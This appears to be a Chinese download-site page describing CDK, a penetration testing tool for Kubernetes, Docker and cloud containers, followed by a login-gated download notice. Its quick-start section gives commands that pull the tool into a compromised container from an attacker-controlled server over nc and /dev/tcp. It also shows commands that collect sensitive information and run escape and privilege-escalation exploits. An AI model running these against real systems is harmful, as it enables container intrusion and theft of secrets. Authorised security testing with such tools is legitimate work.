简介
CDK(Cloud Defense Kit)是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP,专注于检测和利用Kubernetes、Docker及云环境中的安全漏洞。它可以模拟真实攻击场景,帮助用户识别集群配置、权限管理以及容器镜像中的安全问题。CDK支持多种云平台和容器化环境,提供了诸如容器逃逸、权限提升、敏感信息泄露检测等功能,适用于安全研究人员和运维人员进行安全测试和防护评估。
文档:CDK Home CN · cdk-team/CDK Wiki
演示视频
快速使用
- 向容器内下载CDK工具,不使用wget和curl
- 公网服务器执行:
nc -lvp 999 < cdk
- 容器内部执行:
cat < /dev/tcp/<公网机IP>/<公网机监听端口> > cdk
- 公网服务器执行:
- 对环境的敏感信息进行收集
./cdk_linux_amd64_upx eva --full
- 列出工具的攻击模块
./cdk_linux_amd64_upx run --list
- 执行指定EXP
./cdk run <script-name> [options]
- 模拟执行nc命令
监听
cdk nc -l -v -p <port>
连接
cdk nc -h <host> -p <port>
下载
极核始终提供一条免费的直链下载通道!
为防止恶意爬取下载,请登录并回复后下载!
为防止恶意爬取下载,请登录并回复后下载!
✈️ 全球下载通道
🚀 极核加速通道
THE END
- 最新
- 最热
只看作者